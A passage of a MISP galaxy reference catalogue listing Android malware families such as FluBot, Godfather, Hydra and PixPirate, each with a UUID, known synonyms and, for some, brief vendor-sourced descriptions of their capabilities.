UUID 4305d59a-0d07-4021-a902-e7996378898b which can be used as unique global reference for FlexiSpy (Android) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

FlexNet

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular FlexNet.

Known Synonyms
gugi
Internal MISP references

UUID 80d7d229-b3a7-4205-8304-f7b18bda129f which can be used as unique global reference for FlexNet in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

FluBot

PRODAFT describes FluBot as a banking malware which originally targeted Spain. Since the first quarter of 2021 it has been targeting many other European countries as well as Japan. It uses a DGA for it's C&C and relies on both DNS and DNS-over-HTTPS for name resolution. Despite arrests of multiple people suspected of involvement with this malware in March of 2021, the campaign has only intensified since.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular FluBot.

Known Synonyms
Cabassous
FakeChat
Internal MISP references

UUID ef91833f-3334-4955-9218-f106494e9fc0 which can be used as unique global reference for FluBot in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

FluHorse

According to Check Point, this malware features several malicious Android applications that mimic legitimate applications, most of which have more than 1,000,000 installs. These malicious apps steal the victims’ credentials and Two-Factor Authentication (2FA) codes. FluHorse targets different sectors of Eastern Asian markets and is distributed via emails. In some cases, the emails used in the first stage of the attacks belong to high-profile entities. The malware can remain undetected for months making it a persistent, dangerous, and hard-to-spot threat.

Internal MISP references

UUID aeaeb8b2-650e-471d-a901-3c4fbae42854 which can be used as unique global reference for FluHorse in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

FlyTrap

Zimperium notes that this malware has hit more than 10,000 victims in 140+ countries using social media hijacking, 3rd party app stores and sideloading.

Internal MISP references

UUID 24af5bcc-d4bd-42dd-aed4-f994b30b4921 which can be used as unique global reference for FlyTrap in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

FunkyBot

Internal MISP references

UUID bc0d37fa-113a-45ba-8a1c-b9d818e31f27 which can be used as unique global reference for FunkyBot in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

FurBall

According to Check Point, they uncovered an operation dubbed "Domestic Kitten", which uses malicious Android applications to steal sensitive personal information from its victims: screenshots, messages, call logs, surrounding voice recordings, and more. This operation managed to remain under the radar for a long time, as the associated files were not attributed to a known malware family and were only detected by a handful of security vendors.

Internal MISP references

UUID 53282cc8-fefc-47d7-b6a5-a82a05a88f2a which can be used as unique global reference for FurBall in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Gaganode (Android)

According to Synthient, Gaganode is a decentralized bandwidth monetization service that enables both users and publishers to earn crypto for their bandwidth or monetize other people's bandwidth. The SDK intentionally implements RCE, thus aligning Gaganode more closely with malware than standard commercial SDKs.

Internal MISP references

UUID 1034e0e2-0643-40e3-b25e-32f541e9d3c1 which can be used as unique global reference for Gaganode (Android) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Geost

Internal MISP references

UUID b9639878-733c-4f30-9a13-4680a7e17415 which can be used as unique global reference for Geost in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Ghimob

Internal MISP references

UUID 3d1f2591-05fe-42f4-aaf8-ed1428f17605 which can be used as unique global reference for Ghimob in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

GhostCtrl

Internal MISP references

UUID 3b6c1771-6d20-4177-8be0-12116e254bf5 which can be used as unique global reference for GhostCtrl in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Gigabud

Gigabud is the name of an Android Remote Access Trojan (RAT) Android that can record the victim's screen and steal banking credentials by abusing the Accessibility Service. Gigabud masquerades as banking, shopping, and other applications. Threat actors have been observed using deceptive websites to distribute Gigabud RAT.

Internal MISP references

UUID 8f188382-7a31-46a5-83c6-5991dfe739ee which can be used as unique global reference for Gigabud in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Ginp

Ginp is a mobile banking software targeting Android devices that was discovered by Kaspersky. The malware is able to steal both user credentials and credit cards numbers by implementing overlay attacks. For this, overlay targets are for example the default SMS application. What makes Ginp a remarkable family is how its operators managed to have it remain undetected over time even and it receiving version upgrades over many years. According to ThreatFabric, Ginp has the following features:

Overlaying: Dynamic (local overlays obtained from the C2) SMS harvesting: SMS listing SMS harvesting: SMS forwarding Contact list collection Application listing Overlaying: Targets list update SMS: Sending Calls: Call forwarding C2 Resilience: Auxiliary C2 list Self-protection: Hiding the App icon Self-protection: Preventing removal Self-protection: Emulation-detection.

Internal MISP references

UUID 77e9ace0-f6e5-4d6e-965a-a653ff626be1 which can be used as unique global reference for Ginp in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

GlanceLove

Internal MISP references

UUID 24a709ef-c2e4-45ca-90b6-dfa184472f49 which can be used as unique global reference for GlanceLove in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

GnatSpy

Internal MISP references

UUID a3b6a355-3afe-49ae-9f87-679c6c382943 which can be used as unique global reference for GnatSpy in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

GoatRAT

Internal MISP references

UUID f699d295-1072-418b-8aa2-cb36fbd4c6c7 which can be used as unique global reference for GoatRAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Godfather

According to PCrisk, Godfather is the name of an Android malware targeting online banking pages and cryptocurrency exchanges in 16 countries. It opens fake login windows over legitimate applications. Threat actors use Godfather to steal account credentials. Additionally, Godfather can steal SMSs, device information, and other data.

Internal MISP references

UUID 8e95a9d5-08fb-4f11-b70a-622148bd1e62 which can be used as unique global reference for Godfather in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

GoldenEagle

Internal MISP references

UUID b7c0c11d-8471-4b10-bbf2-f9c0f30bc27e which can be used as unique global reference for GoldenEagle in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

GoldenRAT

Internal MISP references

UUID e111fff8-c73c-4069-b804-2d3732653481 which can be used as unique global reference for GoldenRAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

GoldDigger

Internal MISP references

UUID 8ff9cde1-627e-4967-8b12-195544f31d83 which can be used as unique global reference for GoldDigger in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

goontact

Internal MISP references

UUID 008ef3f3-579e-4065-ad0a-cf96be00becf which can be used as unique global reference for goontact in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

GPlayed

Cisco Talos identifies GPlayed as a malware written in .NET using the Xamarin environment for mobile applications. It is considered powerful because of its capability to adapt after its deployment. In order to achieve this adaptability, the operator has the capability to remotely load plugins, inject scripts and even compile new .NET code that can be executed.

Internal MISP references

UUID 13dc1ec7-aba7-4553-b990-8323405a1d32 which can be used as unique global reference for GPlayed in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Gravity RAT (Android)

Internal MISP references

UUID fed09d31-6378-4e85-b644-5500491dff88 which can be used as unique global reference for Gravity RAT (Android) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

GriftHorse

Internal MISP references

UUID fe40a0b2-be48-41c5-8814-7fa3a6a993b9 which can be used as unique global reference for GriftHorse in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Guerrilla

Internal MISP references

UUID 57de6ac2-8cf0-4022-aee2-5f76e3dbd503 which can be used as unique global reference for Guerrilla in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Gustuff

Group-IB describes Gustuff as a mobile Android Trojan, which includes potential targets of customers in leading international banks, users of cryptocurrency services, popular ecommerce websites and marketplaces. Gustuff has previously never been reported. Gustuff is a new generation of malware complete with fully automated features designed to steal both fiat and crypto currency from user accounts en masse. The Trojan uses the Accessibility Service, intended to assist people with disabilities. The analysis of Gustuff sample revealed that the Trojan is equipped with web fakes designed to potentially target users of Android apps of top international banks including Bank of America, Bank of Scotland, J.P.Morgan, Wells Fargo, Capital One, TD Bank, PNC Bank, and crypto services such as Bitcoin Wallet, BitPay, Cryptopay, Coinbase etc. Group-IB specialists discovered that Gustuff could potentially target users of more than 100 banking apps, including 27 in the US, 16 in Poland, 10 in Australia, 9 in Germany, and 8 in India and users of 32 cryptocurrency apps.

Internal MISP references

UUID a5e2b65f-2087-465d-bf14-4acf891d5d0f which can be used as unique global reference for Gustuff in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

HARDRAIN (Android)

Internal MISP references

UUID 0caf0292-b01a-4439-b56f-c75b71900bc0 which can be used as unique global reference for HARDRAIN (Android) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

HawkShaw

Internal MISP references

UUID 5ae490bd-84ca-434f-ab34-b87bd38e4523 which can be used as unique global reference for HawkShaw in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

HenBox

Internal MISP references

UUID 0185f9f6-018e-4eb5-a214-d810cb759a38 which can be used as unique global reference for HenBox in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Hermit

Lookout states that Hermit is an advanced spyware designed to target iOS and Android mobile devices. It is designed to collect extensive amounts of sensitive data on its victims such as their location, contacts, private messages, photos, call logs, phone conversations, ambient audio recordings, and more.

Internal MISP references

UUID b95f25a0-ba22-4320-95e3-323fbf852846 which can be used as unique global reference for Hermit in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

HeroRAT

Internal MISP references

UUID 537f17ac-74e5-440b-8659-d4fdb4af41a6 which can be used as unique global reference for HeroRAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

HiddenAd

HiddenAd is a malware that shows ads as overlays on the phone.

Internal MISP references

UUID 171c97ca-6b61-426d-8f72-c099528625e9 which can be used as unique global reference for HiddenAd in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

HilalRAT

RAT, which can be used to extract sensitive information, e.g. contact lists, txt messages, location information.

Internal MISP references

UUID 96bea6aa-3202-4352-8e36-fa05c677c0e8 which can be used as unique global reference for HilalRAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Hook

According to ThreatFabric, this is a malware family based on apk.ermac. The name hook is the self-advertised named by its vendor DukeEugene. It provides WebSocket communication and has RAT capabilities.

Internal MISP references

UUID c101bc42-1011-43f6-9d30-629013c318cd which can be used as unique global reference for Hook in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Hydra

Avira states that Hydra is an Android BankBot variant, a type of malware designed to steal banking credentials. The way it does this is by requesting the user enables dangerous permissions such as accessibility and every time the banking app is opened, the malware is hijacking the user by overwriting the legit banking application login page with a malicious one. The goal is the same, to trick the user to enter his login credentials so that it will go straight to the malware authors.

Internal MISP references

UUID ae25953d-cf7c-4304-9ea2-2ea1498ea035 which can be used as unique global reference for Hydra in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

IPStorm (Android)

Android variant of IPStorm (InterPlanetary Storm).

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular IPStorm (Android).

Known Synonyms
InterPlanetary Storm
Internal MISP references

UUID dc0c8824-64ac-4ab2-a0e4-955a14ecc59c which can be used as unique global reference for IPStorm (Android) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

IRATA

According to redpiranha, IRATA (Iranian Remote Access Trojan) Android Malware is a new malware detected in the wild. It originates from a phishing attack through SMS. The theme of the message resembles information coming from the government that will ask you to download this malicious application. IRATA can collect sensitive information from your mobile phone including bank details. Since it infects your mobile, it can also gather your SMS messages which then can be used to obtain 2FA tokens.

Internal MISP references

UUID 24fb43b4-d6a6-49c0-a862-4211a245b635 which can be used as unique global reference for IRATA in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

IRRat

Internal MISP references

UUID 3e7c6e8c-46fc-4498-a28d-5b3d144c51cf which can be used as unique global reference for IRRat in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

JadeRAT

Internal MISP references

UUID 8804e02c-a139-4c3d-8901-03302ca1faa0 which can be used as unique global reference for JadeRAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Joker

Joker is one of the most well-known malware families on Android devices. It manages to take advantage of Google’s official app store with the help of its trail signatures which includes updating the virus’s code, execution process, and payload-retrieval techniques. This malware is capable of stealing users’ personal information including contact details, device data, WAP services, and SMS messages.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Joker.

Known Synonyms
Bread
Internal MISP references

UUID aa2ad8f4-3c46-4f16-994b-2a79c7481cac which can be used as unique global reference for Joker in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

KevDroid

Internal MISP references

UUID 1e1924b5-89cb-408b-bcee-d6aaef7b24e0 which can be used as unique global reference for KevDroid in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

KnSpy

Internal MISP references

UUID 084ebca7-91da-4d9c-8211-a18f358ac28b which can be used as unique global reference for KnSpy in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Koler

Internal MISP references

UUID 4ff34778-de4b-4f48-9184-4975c8ccc3f3 which can be used as unique global reference for Koler in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Konni (Android)

Internal MISP references

UUID d4f90ffc-72cb-49a5-b796-527785f49161 which can be used as unique global reference for Konni (Android) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

KoSpy

According to Lookout, this spyware was first observed in March 2022 and remains active with new samples still publicly hosted. It uses a two-stage C2 infrastructure that retrieves initial configurations from a Firebase cloud database. KoSpy can collect extensive data, such as SMS messages, call logs, location, files, audio, and screenshots via dynamically loaded plugins. The spyware has Korean language support with samples distributed across Google Play and third-party app stores such as Apkpure.

Internal MISP references

UUID b7a1499f-b5fb-4b1f-a2ec-f7907faa506b which can be used as unique global reference for KoSpy in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

KSREMOTE

Internal MISP references

UUID 196d51bf-cf97-455d-b997-fc3e377f2188 which can be used as unique global reference for KSREMOTE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

LANDFALL

Internal MISP references

UUID f5c4095f-d1c5-4026-8fc0-946f0575cd7f which can be used as unique global reference for LANDFALL in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

LittleLooter

Internal MISP references

UUID 41cb4397-7ae0-4a9f-894f-47828e768aa9 which can be used as unique global reference for LittleLooter in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Loki

Internal MISP references

UUID a6f481fe-b6db-4507-bb3c-28f10d800e2f which can be used as unique global reference for Loki in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

LokiBot

Android banker Trojan with the standard banking capabilities such as overlays, SMS stealing. It also features ransomware functionality. Note, the network traffic is obfuscated the same way as in Android Bankbot.

Internal MISP references

UUID 4793a29b-1191-4750-810e-9301a6576fc4 which can be used as unique global reference for LokiBot in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

LuckyCat

Internal MISP references

UUID 1785a4dd-4044-4405-91c2-efb722801867 which can be used as unique global reference for LuckyCat in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

LunaSpy

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular LunaSpy.

Known Synonyms
Backdoor.916
Internal MISP references

UUID 259eb95e-f622-40d2-b6e0-79d07035fef5 which can be used as unique global reference for LunaSpy in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Mandrake

Internal MISP references

UUID 0f587654-7f70-43be-9f1f-95e3a2cc2014 which can be used as unique global reference for Mandrake in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Marcher

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Marcher.

Known Synonyms
ExoBot
Internal MISP references

UUID f691663a-b360-4c0d-a4ee-e9203139c38e which can be used as unique global reference for Marcher in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

MasterFred

According to heimdal, MasterFred malware, this is designed as an Android trojan that makes use of false login overlays to target not only Netflix, Instagram, and Twitter users, but also bank customers. The hackers’ goal is to steal credit card information.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular MasterFred.

Known Synonyms
Brox
Internal MISP references

UUID 87131ea3-4c5e-42ba-a8e2-edd62a0bcd8d which can be used as unique global reference for MasterFred in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

MazarBot

Internal MISP references

UUID 38cbdc29-a5af-46ae-ab82-baf3f6999826 which can be used as unique global reference for MazarBot in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Medusa (Android)

According to ThreatFabric, this is an Android banking trojan under active development as of July 2020. It is using TCP for C&C communication and targets Turkish banks.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Medusa (Android).

Known Synonyms
Gorgona
Internal MISP references

UUID f155e529-dbea-4e4d-9df3-518401191c82 which can be used as unique global reference for Medusa (Android) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Meterpreter (Android)

Internal MISP references

UUID e1ae3e4e-5aaf-4ffe-ba2f-7871507f6d52 which can be used as unique global reference for Meterpreter (Android) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

MobileOrder

Check Point has identified samples of this spyware being distributed since 2015. No samples were found on Google Play, meaning they were likely through other channels like social engineering.

Internal MISP references

UUID ee19588f-9752-4516-85f4-de18acfc64b3 which can be used as unique global reference for MobileOrder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Monokle

Monokle is a sophisticated mobile surveillanceware that possesses remote access trojan (RAT) functionality, advanced data exfiltration techniques as well as the ability to install an attacker-specified certificate to the trusted certificates on an infected device that would allow for man-in-the-middle (MITM) attacks. According to Lookout researchers, It is believed to be developed by Special Technology Center (STC), which is a Russian defense contractor sanctioned by the U.S. Government in connection to alleged interference in the 2016 US presidential elections.

Internal MISP references

UUID 739d6d22-b187-4754-9098-22625ea612cc which can be used as unique global reference for Monokle in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

MoqHao

MoqHao, also called Wroba and XLoader (not to be confused with the malware of the same name for Windows and macOS), is an Android-based mobile threat that is associated with a financially motivated Chinese group called Roaming Mantis. The malware claims to be the default SMS application and has dropper and banker capabilities.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular MoqHao.

Known Synonyms
Shaoye
Wroba
XLoader
Internal MISP references

UUID 41a9408d-7020-4988-af2c-51baf4d20763 which can be used as unique global reference for MoqHao in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

MOrder RAT

Internal MISP references

UUID f91f27ad-edcd-4e3d-824e-23f6acd81a7b which can be used as unique global reference for MOrder RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Mudwater

Internal MISP references

UUID 9a8a5dd0-c86e-40d1-bc94-51070447c907 which can be used as unique global reference for Mudwater in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

MysteryBot

MysteryBot is an Android banking Trojan with overlay capabilities with support for Android 7/8 but also provides other features such as key logging and ransomware functionality.

Internal MISP references

UUID 0a53ace4-98ae-442f-be64-b8e373948bde which can be used as unique global reference for MysteryBot in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Nexus

Internal MISP references

UUID fe0b4e6e-268e-4c63-a095-bf1ddff95055 which can be used as unique global reference for Nexus in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

OmniRAT

Internal MISP references

UUID ec936d58-6607-4e33-aa97-0e587bbbdda5 which can be used as unique global reference for OmniRAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Oscorp

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Oscorp.

Known Synonyms
UBEL
Internal MISP references

UUID 8d383260-102f-46da-8cc6-7659cbbd9452 which can be used as unique global reference for Oscorp in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

PackChat

Internal MISP references

UUID b0f56103-1771-4e01-9ed7-44149e39ce93 which can be used as unique global reference for PackChat in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

PhantomLance

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular PhantomLance.

Known Synonyms
PWNDROID1
Internal MISP references

UUID a73375a5-3384-4515-8538-b598d225586d which can be used as unique global reference for PhantomLance in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Phoenix

Internal MISP references

UUID b5d57344-0486-4580-a437-54c61cb0bf4d which can be used as unique global reference for Phoenix in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

PhoneSpy

According to Zimperium, PhoneSpy is a spyware aimed at South Korean residents with Android devices.

Internal MISP references

UUID ff00bbb6-6856-4cf5-adde-d1cc536dd0e2 which can be used as unique global reference for PhoneSpy in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

PINEFLOWER

According to Mandiant, PINEFLOWER is an Android malware family capable of a wide range of backdoor functionality, including stealing system inform information, logging and recording phone calls, initiating audio recordings, reading SMS inboxes and sending SMS messages. The malware also has features to facilitate device location tracking, deleting, downloading, and uploading files, reading connectivity state, speed, and activity, and toggling Bluetooth, Wi-Fi, and mobile data settings.

Internal MISP references

UUID a17a7c5d-0a8f-42e7-b4c9-63c258267776 which can be used as unique global reference for PINEFLOWER in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

PixPirate

According to PCrisk, The PixPirate is a dangerous Android banking Trojan that has the capability to carry out ATS (Automatic Transfer System) attacks. This allows threat actors to automatically transfer funds through the Pix Instant Payment platform, which numerous Brazilian banks use.

In addition to launching ATS attacks, PixPirate can intercept and delete SMS messages, prevent the uninstallation process, and carry out malvertising attacks.

Internal MISP references

UUID cdf707bd-a8b0-4ee3-917d-a56b11f30206 which can be used as unique global reference for PixPirate in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

PixStealer

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular PixStealer.

Known Synonyms
BrazKing
Internal MISP references

UUID 5d047596-eb67-4fed-b41d-65fa975150c5 which can be used as unique global reference for PixStealer in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

PjobRAT

Internal MISP references

UUID 6fa6c769-2546-4a5c-a3c7-24dda4ab597d which can be used as unique global reference for PjobRAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

PlainGnome

According to Lookout, PlainGnome consists of a two-stage deployment in which a very minimal first stage drops a malicious APK once it’s installed. The code of PlainGnome’s second stage payload evolved significantly from January 2024 through at least October. In particular, PlainGnome’s developers shifted to using Jetpack WorkManager classes to handle data exfiltration, which eases development and maintenance of related code. In addition, WorkManager allows for specifying execution conditions. For example, PlainGnome only exfiltrates data from victim devices when the device enters an idle state. This mechanism is probably intended to reduce the chance of a victim noticing the presence of PlainGnome on their device. As opposed to the minimalist first (installer) stage, the second stage carries out all surveillance functionality and relies on 38 permissions.

Internal MISP references

UUID d67bedfc-11d6-4784-83f2-9a38887e1298 which can be used as unique global reference for PlainGnome in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Podec

Internal MISP references

UUID 82f9c4c1-2619-4236-a701-776c6c781f45 which can be used as unique global reference for Podec in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

X-Agent (Android)

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular X-Agent (Android).

Known Synonyms
Popr-d30
Internal MISP references

UUID 0a7d9d22-a26d-4a2b-ab9b-b296176c3ecf which can be used as unique global reference for X-Agent (Android) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Fake Pornhub

Internal MISP references

UUID 3272a8d8-8323-4e98-b6ce-cb40789a3616 which can be used as unique global reference for Fake Pornhub in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Premier RAT

Internal MISP references

UUID 661471fe-2cb6-4b83-9deb-43225192a849 which can be used as unique global reference for Premier RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Princess

Internal MISP references

UUID 2665959a-8686-44b3-ad01-5ef21a5cac1b which can be used as unique global reference for Princess in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Rafel RAT

Internal MISP references

UUID cdaa0a6d-3709-4e6f-8807-fff388baaba0 which can be used as unique global reference for Rafel RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

RambleOn

Internal MISP references

UUID 41ab3c99-297c-465c-8375-3e9f7ce4b996 which can be used as unique global reference for RambleOn in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Rana

Internal MISP references

UUID 65a8e406-b535-4c0a-bc6d-d1bec3c55623 which can be used as unique global reference for Rana in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

RatMilad

RatMilad, a newly discovered Android spyware, has been stealing data from mobile devices in the Middle East. The malware is spread through links on social media and pretends to be applications for services like VPN and phone number spoofing. Unwary users download these trojan applications and grant access to malware.

Internal MISP references

UUID 542c3e5e-2124-4c36-af05-65893974d5ce which can be used as unique global reference for RatMilad in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

RatOn

According to ThreatFabric, this RAT can perform NFC relay attacks and has Automated Transfer ystem (ATS) capabilities

Internal MISP references

UUID 0bc2b50d-9627-4eaf-a320-9d3f0f53981a which can be used as unique global reference for RatOn in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Raxir

Internal MISP references

UUID f5cabe73-b5d6-4503-8350-30a6d54c32ef which can be used as unique global reference for Raxir in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

RedAlert2

RedAlert 2 is an new Android malware used by an attacker to gain access to login credentials of various e-banking apps. The malware works by overlaying a login screen with a fake display that sends the credentials to a C2 server. The malware also has the ability to block incoming calls from banks, to prevent the victim of being notified. As a distribution vector RedAlert 2 uses third-party app stores and imitates real Android apps like Viber, Whatsapp or fake Adobe Flash Player updates.

Internal MISP references

UUID e9aaab46-abb1-4390-b37b-d0457d05b28f which can be used as unique global reference for RedAlert2 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Remo

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Remo.

Known Synonyms
PlayPraetor
Internal MISP references

UUID 74450154-9b2d-434c-b1d7-846bfb8d1de3 which can be used as unique global reference for Remo in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

RemRAT

Internal MISP references

UUID 23809a2b-3c24-41c5-a310-2b8045539202 which can be used as unique global reference for RemRAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Retefe (Android)

The Android app using for Retefe is a SMS stealer, used to forward mTAN codes to the threat actor. Further is a bank logo added to the specific Android app to trick users into thinking this is a legitimate app. Moreover, if the victim is not a real victim, the link to download the APK is not the malicious APK, but the real 'Signal Private Messenger' tool, hence the victim's phone doesn't get infected.

Internal MISP references

UUID 22ef1e56-7778-41d1-9b2b-737aa5bf9777 which can be used as unique global reference for Retefe (Android) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Revive

According to PCrisk, Revive is the name of a banking Trojan targeting Android users (customers of a specific Spanish bank). It steals sensitive information. Cybercriminals use Revive to take ownership of online accounts using stolen login credentials. This malware abuses Accessibility Services to perform malicious activities.

Internal MISP references

UUID 25669934-14bf-463f-bcae-c59c590c3bf8 which can be used as unique global reference for Revive in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Riltok

Internal MISP references

UUID d7b347f8-77a5-4197-b818-f3af504da2c1 which can be used as unique global reference for Riltok in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Roaming Mantis

Internal MISP references

UUID 31d2ce1f-44bf-4738-a41d-ddb43466cd82 which can be used as unique global reference for Roaming Mantis in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Rogue

Internal MISP references

UUID 4b53480a-8006-4af7-8e4e-cc8727c62648 which can be used as unique global reference for Rogue in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Rootnik

Internal MISP references

UUID db3dcfd1-79d2-4c91-898f-5f2463d7c417 which can be used as unique global reference for Rootnik in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Salvador Stealer

According to ANY.RUN, this is a banking trojan that this collection sensitive user information, including: Registered mobile number, Aadhaar number, PAN card details, Date of birth, and Net banking user ID and password. It uses Telegram as C2.

Internal MISP references

UUID a815d079-3e70-4c51-9bf6-76217beb49fc which can be used as unique global reference for Salvador Stealer in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Sauron Locker

Internal MISP references

UUID a7c058cf-d482-42cf-9ea7-d5554287ea65 which can be used as unique global reference for Sauron Locker in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

SharkBot

